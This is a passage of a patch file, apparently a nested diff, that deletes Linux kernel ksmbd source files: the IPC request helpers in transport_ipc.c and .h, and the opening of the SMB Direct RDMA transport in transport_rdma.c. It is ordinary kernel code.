+-			blob_len + 1);
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST;
+-	req = (struct ksmbd_spnego_authen_request *)msg->payload;
+-	req->handle = ksmbd_acquire_id(&ipc_ida);
+-	req->spnego_blob_len = blob_len;
+-	memcpy(req->spnego_blob, spnego_blob, blob_len);
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_handle_free(req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
+-struct ksmbd_tree_connect_response *
+-ksmbd_ipc_tree_connect_request(struct ksmbd_session *sess,
+-			       struct ksmbd_share_config *share,
+-			       struct ksmbd_tree_connect *tree_conn,
+-			       struct sockaddr *peer_addr)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_tree_connect_request *req;
+-	struct ksmbd_tree_connect_response *resp;
+-
+-	if (strlen(user_name(sess->user)) >= KSMBD_REQ_MAX_ACCOUNT_NAME_SZ)
+-		return NULL;
+-
+-	if (strlen(share->name) >= KSMBD_REQ_MAX_SHARE_NAME)
+-		return NULL;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_tree_connect_request));
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_TREE_CONNECT_REQUEST;
+-	req = (struct ksmbd_tree_connect_request *)msg->payload;
+-
+-	req->handle = ksmbd_acquire_id(&ipc_ida);
+-	req->account_flags = sess->user->flags;
+-	req->session_id = sess->id;
+-	req->connect_id = tree_conn->id;
+-	strscpy(req->account, user_name(sess->user), KSMBD_REQ_MAX_ACCOUNT_NAME_SZ);
+-	strscpy(req->share, share->name, KSMBD_REQ_MAX_SHARE_NAME);
+-	snprintf(req->peer_addr, sizeof(req->peer_addr), "%pIS", peer_addr);
+-
+-	if (peer_addr->sa_family == AF_INET6)
+-		req->flags |= KSMBD_TREE_CONN_FLAG_REQUEST_IPV6;
+-	if (test_session_flag(sess, CIFDS_SESSION_FLAG_SMB2))
+-		req->flags |= KSMBD_TREE_CONN_FLAG_REQUEST_SMB2;
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_handle_free(req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
+-int ksmbd_ipc_tree_disconnect_request(unsigned long long session_id,
+-				      unsigned long long connect_id)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_tree_disconnect_request *req;
+-	int ret;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_tree_disconnect_request));
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	msg->type = KSMBD_EVENT_TREE_DISCONNECT_REQUEST;
+-	req = (struct ksmbd_tree_disconnect_request *)msg->payload;
+-	req->session_id = session_id;
+-	req->connect_id = connect_id;
+-
+-	ret = ipc_msg_send(msg);
+-	ipc_msg_free(msg);
+-	return ret;
+-}
+-
+-int ksmbd_ipc_logout_request(const char *account, int flags)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_logout_request *req;
+-	int ret;
+-
+-	if (strlen(account) >= KSMBD_REQ_MAX_ACCOUNT_NAME_SZ)
+-		return -EINVAL;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_logout_request));
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	msg->type = KSMBD_EVENT_LOGOUT_REQUEST;
+-	req = (struct ksmbd_logout_request *)msg->payload;
+-	req->account_flags = flags;
+-	strscpy(req->account, account, KSMBD_REQ_MAX_ACCOUNT_NAME_SZ);
+-
+-	ret = ipc_msg_send(msg);
+-	ipc_msg_free(msg);
+-	return ret;
+-}
+-
+-struct ksmbd_share_config_response *
+-ksmbd_ipc_share_config_request(const char *name)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_share_config_request *req;
+-	struct ksmbd_share_config_response *resp;
+-
+-	if (strlen(name) >= KSMBD_REQ_MAX_SHARE_NAME)
+-		return NULL;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_share_config_request));
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_SHARE_CONFIG_REQUEST;
+-	req = (struct ksmbd_share_config_request *)msg->payload;
+-	req->handle = ksmbd_acquire_id(&ipc_ida);
+-	strscpy(req->share_name, name, KSMBD_REQ_MAX_SHARE_NAME);
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_handle_free(req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
+-struct ksmbd_rpc_command *ksmbd_rpc_open(struct ksmbd_session *sess, int handle)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_rpc_command *req;
+-	struct ksmbd_rpc_command *resp;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command));
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_RPC_REQUEST;
+-	req = (struct ksmbd_rpc_command *)msg->payload;
+-	req->handle = handle;
+-	req->flags = ksmbd_session_rpc_method(sess, handle);
+-	req->flags |= KSMBD_RPC_OPEN_METHOD;
+-	req->payload_sz = 0;
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
+-struct ksmbd_rpc_command *ksmbd_rpc_close(struct ksmbd_session *sess, int handle)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_rpc_command *req;
+-	struct ksmbd_rpc_command *resp;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command));
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_RPC_REQUEST;
+-	req = (struct ksmbd_rpc_command *)msg->payload;
+-	req->handle = handle;
+-	req->flags = ksmbd_session_rpc_method(sess, handle);
+-	req->flags |= KSMBD_RPC_CLOSE_METHOD;
+-	req->payload_sz = 0;
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
+-struct ksmbd_rpc_command *ksmbd_rpc_write(struct ksmbd_session *sess, int handle,
+-					  void *payload, size_t payload_sz)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_rpc_command *req;
+-	struct ksmbd_rpc_command *resp;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command) + payload_sz + 1);
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_RPC_REQUEST;
+-	req = (struct ksmbd_rpc_command *)msg->payload;
+-	req->handle = handle;
+-	req->flags = ksmbd_session_rpc_method(sess, handle);
+-	req->flags |= rpc_context_flags(sess);
+-	req->flags |= KSMBD_RPC_WRITE_METHOD;
+-	req->payload_sz = payload_sz;
+-	memcpy(req->payload, payload, payload_sz);
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
+-struct ksmbd_rpc_command *ksmbd_rpc_read(struct ksmbd_session *sess, int handle)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_rpc_command *req;
+-	struct ksmbd_rpc_command *resp;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command));
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_RPC_REQUEST;
+-	req = (struct ksmbd_rpc_command *)msg->payload;
+-	req->handle = handle;
+-	req->flags = ksmbd_session_rpc_method(sess, handle);
+-	req->flags |= rpc_context_flags(sess);
+-	req->flags |= KSMBD_RPC_READ_METHOD;
+-	req->payload_sz = 0;
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
+-struct ksmbd_rpc_command *ksmbd_rpc_ioctl(struct ksmbd_session *sess, int handle,
+-					  void *payload, size_t payload_sz)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_rpc_command *req;
+-	struct ksmbd_rpc_command *resp;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command) + payload_sz + 1);
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_RPC_REQUEST;
+-	req = (struct ksmbd_rpc_command *)msg->payload;
+-	req->handle = handle;
+-	req->flags = ksmbd_session_rpc_method(sess, handle);
+-	req->flags |= rpc_context_flags(sess);
+-	req->flags |= KSMBD_RPC_IOCTL_METHOD;
+-	req->payload_sz = payload_sz;
+-	memcpy(req->payload, payload, payload_sz);
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
+-struct ksmbd_rpc_command *ksmbd_rpc_rap(struct ksmbd_session *sess, void *payload,
+-					size_t payload_sz)
+-{
+-	struct ksmbd_ipc_msg *msg;
+-	struct ksmbd_rpc_command *req;
+-	struct ksmbd_rpc_command *resp;
+-
+-	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command) + payload_sz + 1);
+-	if (!msg)
+-		return NULL;
+-
+-	msg->type = KSMBD_EVENT_RPC_REQUEST;
+-	req = (struct ksmbd_rpc_command *)msg->payload;
+-	req->handle = ksmbd_acquire_id(&ipc_ida);
+-	req->flags = rpc_context_flags(sess);
+-	req->flags |= KSMBD_RPC_RAP_METHOD;
+-	req->payload_sz = payload_sz;
+-	memcpy(req->payload, payload, payload_sz);
+-
+-	resp = ipc_msg_send_request(msg, req->handle);
+-	ipc_msg_handle_free(req->handle);
+-	ipc_msg_free(msg);
+-	return resp;
+-}
+-
+-static int __ipc_heartbeat(void)
+-{
+-	unsigned long delta;
+-
+-	if (!ksmbd_server_running())
+-		return 0;
+-
+-	if (time_after(jiffies, server_conf.ipc_last_active)) {
+-		delta = (jiffies - server_conf.ipc_last_active);
+-	} else {
+-		ipc_update_last_active();
+-		schedule_delayed_work(&ipc_timer_work,
+-				      server_conf.ipc_timeout);
+-		return 0;
+-	}
+-
+-	if (delta < server_conf.ipc_timeout) {
+-		schedule_delayed_work(&ipc_timer_work,
+-				      server_conf.ipc_timeout - delta);
+-		return 0;
+-	}
+-
+-	if (ksmbd_ipc_heartbeat_request() == 0) {
+-		schedule_delayed_work(&ipc_timer_work,
+-				      server_conf.ipc_timeout);
+-		return 0;
+-	}
+-
+-	mutex_lock(&startup_lock);
+-	WRITE_ONCE(server_conf.state, SERVER_STATE_RESETTING);
+-	server_conf.ipc_last_active = 0;
+-	ksmbd_tools_pid = 0;
+-	pr_err("No IPC daemon response for %lus\n", delta / HZ);
+-	mutex_unlock(&startup_lock);
+-	return -EINVAL;
+-}
+-
+-static void ipc_timer_heartbeat(struct work_struct *w)
+-{
+-	if (__ipc_heartbeat())
+-		server_queue_ctrl_reset_work();
+-}
+-
+-int ksmbd_ipc_id_alloc(void)
+-{
+-	return ksmbd_acquire_id(&ipc_ida);
+-}
+-
+-void ksmbd_rpc_id_free(int handle)
+-{
+-	ksmbd_release_id(&ipc_ida, handle);
+-}
+-
+-void ksmbd_ipc_release(void)
+-{
+-	cancel_delayed_work_sync(&ipc_timer_work);
+-	genl_unregister_family(&ksmbd_genl_family);
+-}
+-
+-void ksmbd_ipc_soft_reset(void)
+-{
+-	mutex_lock(&startup_lock);
+-	ksmbd_tools_pid = 0;
+-	cancel_delayed_work_sync(&ipc_timer_work);
+-	mutex_unlock(&startup_lock);
+-}
+-
+-int ksmbd_ipc_init(void)
+-{
+-	int ret = 0;
+-
+-	ksmbd_nl_init_fixup();
+-	INIT_DELAYED_WORK(&ipc_timer_work, ipc_timer_heartbeat);
+-
+-	ret = genl_register_family(&ksmbd_genl_family);
+-	if (ret) {
+-		pr_err("Failed to register KSMBD netlink interface %d\n", ret);
+-		cancel_delayed_work_sync(&ipc_timer_work);
+-	}
+-
+-	return ret;
+-}
+diff --git a/fs/ksmbd/transport_ipc.h b/fs/ksmbd/transport_ipc.h
+deleted file mode 100644
+index 5e5b90a0c1879..0000000000000
+--- a/fs/ksmbd/transport_ipc.h
++++ /dev/null
+@@ -1,47 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __KSMBD_TRANSPORT_IPC_H__
+-#define __KSMBD_TRANSPORT_IPC_H__
+-
+-#include <linux/wait.h>
+-
+-#define KSMBD_IPC_MAX_PAYLOAD	4096
+-
+-struct ksmbd_login_response *
+-ksmbd_ipc_login_request(const char *account);
+-
+-struct ksmbd_session;
+-struct ksmbd_share_config;
+-struct ksmbd_tree_connect;
+-struct sockaddr;
+-
+-struct ksmbd_tree_connect_response *
+-ksmbd_ipc_tree_connect_request(struct ksmbd_session *sess,
+-			       struct ksmbd_share_config *share,
+-			       struct ksmbd_tree_connect *tree_conn,
+-			       struct sockaddr *peer_addr);
+-int ksmbd_ipc_tree_disconnect_request(unsigned long long session_id,
+-				      unsigned long long connect_id);
+-int ksmbd_ipc_logout_request(const char *account, int flags);
+-struct ksmbd_share_config_response *
+-ksmbd_ipc_share_config_request(const char *name);
+-struct ksmbd_spnego_authen_response *
+-ksmbd_ipc_spnego_authen_request(const char *spnego_blob, int blob_len);
+-int ksmbd_ipc_id_alloc(void);
+-void ksmbd_rpc_id_free(int handle);
+-struct ksmbd_rpc_command *ksmbd_rpc_open(struct ksmbd_session *sess, int handle);
+-struct ksmbd_rpc_command *ksmbd_rpc_close(struct ksmbd_session *sess, int handle);
+-struct ksmbd_rpc_command *ksmbd_rpc_write(struct ksmbd_session *sess, int handle,
+-					  void *payload, size_t payload_sz);
+-struct ksmbd_rpc_command *ksmbd_rpc_read(struct ksmbd_session *sess, int handle);
+-struct ksmbd_rpc_command *ksmbd_rpc_ioctl(struct ksmbd_session *sess, int handle,
+-					  void *payload, size_t payload_sz);
+-struct ksmbd_rpc_command *ksmbd_rpc_rap(struct ksmbd_session *sess, void *payload,
+-					size_t payload_sz);
+-void ksmbd_ipc_release(void);
+-void ksmbd_ipc_soft_reset(void);
+-int ksmbd_ipc_init(void);
+-#endif /* __KSMBD_TRANSPORT_IPC_H__ */
+diff --git a/fs/ksmbd/transport_rdma.c b/fs/ksmbd/transport_rdma.c
+deleted file mode 100644
+index c06efc020bd95..0000000000000
+--- a/fs/ksmbd/transport_rdma.c
++++ /dev/null
+@@ -1,2273 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2017, Microsoft Corporation.
+- *   Copyright (C) 2018, LG Electronics.
+- *
+- *   Author(s): Long Li <longli@microsoft.com>,
+- *		Hyunchul Lee <hyc.lee@gmail.com>
+- */
+-
+-#define SUBMOD_NAME	"smb_direct"
+-
+-#include <linux/kthread.h>
+-#include <linux/list.h>
+-#include <linux/mempool.h>
+-#include <linux/highmem.h>
+-#include <linux/scatterlist.h>
+-#include <rdma/ib_verbs.h>
+-#include <rdma/rdma_cm.h>
+-#include <rdma/rw.h>
+-
+-#include "glob.h"
+-#include "connection.h"
+-#include "smb_common.h"
+-#include "smbstatus.h"
+-#include "transport_rdma.h"
+-
+-#define SMB_DIRECT_PORT_IWARP		5445
+-#define SMB_DIRECT_PORT_INFINIBAND	445
+-
+-#define SMB_DIRECT_VERSION_LE		cpu_to_le16(0x0100)
+-
+-/* SMB_DIRECT negotiation timeout in seconds */
+-#define SMB_DIRECT_NEGOTIATE_TIMEOUT		120
+-
+-#define SMB_DIRECT_MAX_SEND_SGES		6
+-#define SMB_DIRECT_MAX_RECV_SGES		1
+-
+-/*
+- * Default maximum number of RDMA read/write outstanding on this connection
+- * This value is possibly decreased during QP creation on hardware limit
+- */
+-#define SMB_DIRECT_CM_INITIATOR_DEPTH		8
+-
+-/* Maximum number of retries on data transfer operations */
+-#define SMB_DIRECT_CM_RETRY			6
+-/* No need to retry on Receiver Not Ready since SMB_DIRECT manages credits */
+-#define SMB_DIRECT_CM_RNR_RETRY		0
+-
+-/*
+- * User configurable initial values per SMB_DIRECT transport connection
+- * as defined in [MS-SMBD] 3.1.1.1
+- * Those may change after a SMB_DIRECT negotiation
+- */
+-
+-/* Use port 445 as the SMB Direct port by default */
+-static int smb_direct_port = SMB_DIRECT_PORT_INFINIBAND;
+-
+-/* The local peer's maximum number of credits to grant to the peer */
+-static int smb_direct_receive_credit_max = 255;
+-
+-/* The number of send credits the local peer requests from the remote peer */
+-static int smb_direct_send_credit_target = 255;
+-
+-/* The maximum single-message size that can be sent to the remote peer */
+-static int smb_direct_max_send_size = 1364;
+-
+-/*  The maximum fragmented upper-layer payload receive size supported */
+-static int smb_direct_max_fragmented_recv_size = 1024 * 1024;
+-
+-/*  The maximum single-message size which can be received */
+-static int smb_direct_max_receive_size = 1364;
+-
+-static int smb_direct_max_read_write_size = SMBD_DEFAULT_IOSIZE;
+-
+-static LIST_HEAD(smb_direct_device_list);
+-static DEFINE_RWLOCK(smb_direct_device_lock);
+-
+-struct smb_direct_device {
+-	struct ib_device	*ib_dev;
+-	struct list_head	list;
+-};
+-
+-static struct smb_direct_listener {
+-	struct rdma_cm_id	*cm_id;
+-} smb_direct_listener;
+-
+-static struct workqueue_struct *smb_direct_wq;
+-
+-enum smb_direct_status {
+-	SMB_DIRECT_CS_NEW = 0,
+-	SMB_DIRECT_CS_CONNECTED,
+-	SMB_DIRECT_CS_DISCONNECTING,
+-	SMB_DIRECT_CS_DISCONNECTED,
+-};
+-
+-struct smb_direct_transport {
+-	struct ksmbd_transport	transport;
+-
+-	enum smb_direct_status	status;
+-	bool			full_packet_received;
+-	wait_queue_head_t	wait_status;
+-
+-	struct rdma_cm_id	*cm_id;
+-	struct ib_cq		*send_cq;
+-	struct ib_cq		*recv_cq;
+-	struct ib_pd		*pd;
+-	struct ib_qp		*qp;
+-
+-	int			max_send_size;
+-	int			max_recv_size;
+-	int			max_fragmented_send_size;
+-	int			max_fragmented_recv_size;
+-	int			max_rdma_rw_size;
+-
+-	spinlock_t		reassembly_queue_lock;
+-	struct list_head	reassembly_queue;
+-	int			reassembly_data_length;
+-	int			reassembly_queue_length;
+-	int			first_entry_offset;
+-	wait_queue_head_t	wait_reassembly_queue;
+-
+-	spinlock_t		receive_credit_lock;
+-	int			recv_credits;
+-	int			count_avail_recvmsg;
+-	int			recv_credit_max;
+-	int			recv_credit_target;
+-
+-	spinlock_t		recvmsg_queue_lock;
+-	struct list_head	recvmsg_queue;
+-
+-	spinlock_t		empty_recvmsg_queue_lock;
+-	struct list_head	empty_recvmsg_queue;
+-
+-	int			send_credit_target;
+-	atomic_t		send_credits;
+-	spinlock_t		lock_new_recv_credits;
+-	int			new_recv_credits;
+-	int			max_rw_credits;
+-	int			pages_per_rw_credit;
+-	atomic_t		rw_credits;
+-
+-	wait_queue_head_t	wait_send_credits;
+-	wait_queue_head_t	wait_rw_credits;
+-
+-	mempool_t		*sendmsg_mempool;
+-	struct kmem_cache	*sendmsg_cache;
+-	mempool_t		*recvmsg_mempool;
+-	struct kmem_cache	*recvmsg_cache;
+-
+-	wait_queue_head_t	wait_send_pending;
+-	atomic_t		send_pending;
+-
+-	struct delayed_work	post_recv_credits_work;
+-	struct work_struct	send_immediate_work;
+-	struct work_struct	disconnect_work;
+-
+-	bool			negotiation_requested;
+-};
+-
+-#define KSMBD_TRANS(t) ((struct ksmbd_transport *)&((t)->transport))
+-
+-enum {
+-	SMB_DIRECT_MSG_NEGOTIATE_REQ = 0,
+-	SMB_DIRECT_MSG_DATA_TRANSFER
+-};
+-
+-static struct ksmbd_transport_ops ksmbd_smb_direct_transport_ops;
+-
+-struct smb_direct_send_ctx {
+-	struct list_head	msg_list;
+-	int			wr_cnt;
+-	bool			need_invalidate_rkey;
+-	unsigned int		remote_key;
+-};
+-
+-struct smb_direct_sendmsg {
+-	struct smb_direct_transport	*transport;
+-	struct ib_send_wr	wr;
+-	struct list_head	list;
+-	int			num_sge;
+-	struct ib_sge		sge[SMB_DIRECT_MAX_SEND_SGES];
+-	struct ib_cqe		cqe;
+-	u8			packet[];
+-};
+-
+-struct smb_direct_recvmsg {
+-	struct smb_direct_transport	*transport;
+-	struct list_head	list;
+-	int			type;
+-	struct ib_sge		sge;
+-	struct ib_cqe		cqe;
+-	bool			first_segment;
+-	u8			packet[];
+-};
+-
+-struct smb_direct_rdma_rw_msg {
+-	struct smb_direct_transport	*t;
+-	struct ib_cqe		cqe;
+-	int			status;
+-	struct completion	*completion;
+-	struct list_head	list;
+-	struct rdma_rw_ctx	rw_ctx;
+-	struct sg_table		sgt;
+-	struct scatterlist	sg_list[];
+-};
+-
+-void init_smbd_max_io_size(unsigned int sz)
+-{
+-	sz = clamp_val(sz, SMBD_MIN_IOSIZE, SMBD_MAX_IOSIZE);
+-	smb_direct_max_read_write_size = sz;
+-}
+-
+-unsigned int get_smbd_max_read_write_size(void)
+-{
+-	return smb_direct_max_read_write_size;
+-}
+-
+-static inline int get_buf_page_count(void *buf, int size)
+-{
+-	return DIV_ROUND_UP((uintptr_t)buf + size, PAGE_SIZE) -
+-		(uintptr_t)buf / PAGE_SIZE;
+-}
+-
+-static void smb_direct_destroy_pools(struct smb_direct_transport *transport);
+-static void smb_direct_post_recv_credits(struct work_struct *work);
+-static int smb_direct_post_send_data(struct smb_direct_transport *t,
+-				     struct smb_direct_send_ctx *send_ctx,
+-				     struct kvec *iov, int niov,
+-				     int remaining_data_length);
+-
+-static inline struct smb_direct_transport *
+-smb_trans_direct_transfort(struct ksmbd_transport *t)
+-{
+-	return container_of(t, struct smb_direct_transport, transport);
+-}
+-
+-static inline void *
+-smb_direct_recvmsg_payload(struct smb_direct_recvmsg *recvmsg)
+-{
+-	return (void *)recvmsg->packet;
+-}
+-
+-static inline bool is_receive_credit_post_required(int receive_credits,
+-						   int avail_recvmsg_count)
+-{
+-	return receive_credits <= (smb_direct_receive_credit_max >> 3) &&
+-		avail_recvmsg_count >= (receive_credits >> 2);
+-}
+-
+-static struct smb_direct_recvmsg *
+-get_free_recvmsg(struct smb_direct_transport *t)
+-{
+-	struct smb_direct_recvmsg *recvmsg = NULL;
+-
+-	spin_lock(&t->recvmsg_queue_lock);
+-	if (!list_empty(&t->recvmsg_queue)) {
+-		recvmsg = list_first_entry(&t->recvmsg_queue,
+-					   struct smb_direct_recvmsg,
+-					   list);
+-		list_del(&recvmsg->list);
+-	}
+-	spin_unlock(&t->recvmsg_queue_lock);
+-	return recvmsg;
+-}
+-
+-static void put_recvmsg(struct smb_direct_transport *t,
+-			struct smb_direct_recvmsg *recvmsg)
+-{
+-	ib_dma_unmap_single(t->cm_id->device, recvmsg->sge.addr,
+-			    recvmsg->sge.length, DMA_FROM_DEVICE);
+-
+-	spin_lock(&t->recvmsg_queue_lock);
+-	list_add(&recvmsg->list, &t->recvmsg_queue);
+-	spin_unlock(&t->recvmsg_queue_lock);
+-}
+-
+-static struct smb_direct_recvmsg *
+-get_empty_recvmsg(struct smb_direct_transport *t)
+-{
+-	struct smb_direct_recvmsg *recvmsg = NULL;
+-
+-	spin_lock(&t->empty_recvmsg_queue_lock);
+-	if (!list_empty(&t->empty_recvmsg_queue)) {
+-		recvmsg = list_first_entry(&t->empty_recvmsg_queue,
+-					   struct smb_direct_recvmsg, list);
+-		list_del(&recvmsg->list);
+-	}
+-	spin_unlock(&t->empty_recvmsg_queue_lock);
+-	return recvmsg;
+-}
+-
+-static void put_empty_recvmsg(struct smb_direct_transport *t,
+-			      struct smb_direct_recvmsg *recvmsg)
+-{
+-	ib_dma_unmap_single(t->cm_id->device, recvmsg->sge.addr,
+-			    recvmsg->sge.length, DMA_FROM_DEVICE);
+-
+-	spin_lock(&t->empty_recvmsg_queue_lock);
+-	list_add_tail(&recvmsg->list, &t->empty_recvmsg_queue);
+-	spin_unlock(&t->empty_recvmsg_queue_lock);
+-}
+-
+-static void enqueue_reassembly(struct smb_direct_transport *t,
+-			       struct smb_direct_recvmsg *recvmsg,
+-			       int data_length)
+-{
+-	spin_lock(&t->reassembly_queue_lock);
+-	list_add_tail(&recvmsg->list, &t->reassembly_queue);
+-	t->reassembly_queue_length++;
+-	/*
+-	 * Make sure reassembly_data_length is updated after list and
+-	 * reassembly_queue_length are updated. On the dequeue side
+-	 * reassembly_data_length is checked without a lock to determine
+-	 * if reassembly_queue_length and the list are up to date
+-	 */
+-	virt_wmb();
+-	t->reassembly_data_length += data_length;
+-	spin_unlock(&t->reassembly_queue_lock);
+-}
+-
+-static struct smb_direct_recvmsg *get_first_reassembly(struct smb_direct_transport *t)
+-{
+-	if (!list_empty(&t->reassembly_queue))
+-		return list_first_entry(&t->reassembly_queue,
+-				struct smb_direct_recvmsg, list);
+-	else
+-		return NULL;
+-}
+-
+-static void smb_direct_disconnect_rdma_work(struct work_struct *work)
+-{
+-	struct smb_direct_transport *t =
+-		container_of(work, struct smb_direct_transport,
+-			     disconnect_work);
+-
+-	if (t->status == SMB_DIRECT_CS_CONNECTED) {
+-		t->status = SMB_DIRECT_CS_DISCONNECTING;
+-		rdma_disconnect(t->cm_id);
+-	}
+-}
+-
+-static void
+-smb_direct_disconnect_rdma_connection(struct smb_direct_transport *t)
+-{
+-	if (t->status == SMB_DIRECT_CS_CONNECTED)
+-		queue_work(smb_direct_wq, &t->disconnect_work);
+-}
+-
+-static void smb_direct_send_immediate_work(struct work_struct *work)
+-{
+-	struct smb_direct_transport *t = container_of(work,
+-			struct smb_direct_transport, send_immediate_work);
+-
+-	if (t->status != SMB_DIRECT_CS_CONNECTED)
+-		return;
+-
+-	smb_direct_post_send_data(t, NULL, NULL, 0, 0);
+-}
+-
+-static struct smb_direct_transport *alloc_transport(struct rdma_cm_id *cm_id)
+-{
+-	struct smb_direct_transport *t;
+-	struct ksmbd_conn *conn;
+-
+-	t = kzalloc(sizeof(*t), GFP_KERNEL);
+-	if (!t)
+-		return NULL;
+-
+-	t->cm_id = cm_id;
+-	cm_id->context = t;
+-
+-	t->status = SMB_DIRECT_CS_NEW;
+-	init_waitqueue_head(&t->wait_status);
+-
+-	spin_lock_init(&t->reassembly_queue_lock);
+-	INIT_LIST_HEAD(&t->reassembly_queue);
+-	t->reassembly_data_length = 0;
+-	t->reassembly_queue_length = 0;
+-	init_waitqueue_head(&t->wait_reassembly_queue);
+-	init_waitqueue_head(&t->wait_send_credits);
+-	init_waitqueue_head(&t->wait_rw_credits);
+-
+-	spin_lock_init(&t->receive_credit_lock);
+-	spin_lock_init(&t->recvmsg_queue_lock);
+-	INIT_LIST_HEAD(&t->recvmsg_queue);
+-
+-	spin_lock_init(&t->empty_recvmsg_queue_lock);
+-	INIT_LIST_HEAD(&t->empty_recvmsg_queue);
+-
+-	init_waitqueue_head(&t->wait_send_pending);
+-	atomic_set(&t->send_pending, 0);
+-
+-	spin_lock_init(&t->lock_new_recv_credits);
+-
+-	INIT_DELAYED_WORK(&t->post_recv_credits_work,
+-			  smb_direct_post_recv_credits);
+-	INIT_WORK(&t->send_immediate_work, smb_direct_send_immediate_work);
+-	INIT_WORK(&t->disconnect_work, smb_direct_disconnect_rdma_work);
+-
+-	conn = ksmbd_conn_alloc();
+-	if (!conn)
+-		goto err;
+-	conn->transport = KSMBD_TRANS(t);
+-	KSMBD_TRANS(t)->conn = conn;
+-	KSMBD_TRANS(t)->ops = &ksmbd_smb_direct_transport_ops;
+-	return t;
+-err:
+-	kfree(t);
+-	return NULL;
+-}
+-
+-static void free_transport(struct smb_direct_transport *t)
+-{
+-	struct smb_direct_recvmsg *recvmsg;
+-
+-	wake_up_interruptible(&t->wait_send_credits);
+-
+-	ksmbd_debug(RDMA, "wait for all send posted to IB to finish\n");
+-	wait_event(t->wait_send_pending,
+-		   atomic_read(&t->send_pending) == 0);
+-
+-	cancel_work_sync(&t->disconnect_work);
+-	cancel_delayed_work_sync(&t->post_recv_credits_work);
+-	cancel_work_sync(&t->send_immediate_work);
+-
+-	if (t->qp) {
+-		ib_drain_qp(t->qp);
+-		ib_mr_pool_destroy(t->qp, &t->qp->rdma_mrs);
+-		ib_destroy_qp(t->qp);
+-	}
+-
+-	ksmbd_debug(RDMA, "drain the reassembly queue\n");
+-	do {
+-		spin_lock(&t->reassembly_queue_lock);
+-		recvmsg = get_first_reassembly(t);
+-		if (recvmsg) {
+-			list_del(&recvmsg->list);
+-			spin_unlock(&t->reassembly_queue_lock);
+-			put_recvmsg(t, recvmsg);
+-		} else {
+-			spin_unlock(&t->reassembly_queue_lock);
+-		}
+-	} while (recvmsg);
+-	t->reassembly_data_length = 0;
+-
+-	if (t->send_cq)
+-		ib_free_cq(t->send_cq);
+-	if (t->recv_cq)
+-		ib_free_cq(t->recv_cq);
+-	if (t->pd)
+-		ib_dealloc_pd(t->pd);
+-	if (t->cm_id)
+-		rdma_destroy_id(t->cm_id);
+-
+-	smb_direct_destroy_pools(t);
+-	ksmbd_conn_free(KSMBD_TRANS(t)->conn);
+-	kfree(t);
+-}
+-
+-static struct smb_direct_sendmsg *
+-smb_direct_alloc_sendmsg(struct smb_direct_transport *t)
+-{
+-	struct smb_direct_sendmsg *msg;
+-
+-	msg = mempool_alloc(t->sendmsg_mempool, GFP_KERNEL);
+-	if (!msg)
+-		return ERR_PTR(-ENOMEM);
+-	msg->transport = t;
+-	INIT_LIST_HEAD(&msg->list);
+-	msg->num_sge = 0;
+-	return msg;
+-}
+-
+-static void smb_direct_free_sendmsg(struct smb_direct_transport *t,
+-				    struct smb_direct_sendmsg *msg)
+-{
+-	int i;
+-
+-	if (msg->num_sge > 0) {
+-		ib_dma_unmap_single(t->cm_id->device,
+-				    msg->sge[0].addr, msg->sge[0].length,
+-				    DMA_TO_DEVICE);
+-		for (i = 1; i < msg->num_sge; i++)
+-			ib_dma_unmap_page(t->cm_id->device,
+-					  msg->sge[i].addr, msg->sge[i].length,
+-					  DMA_TO_DEVICE);
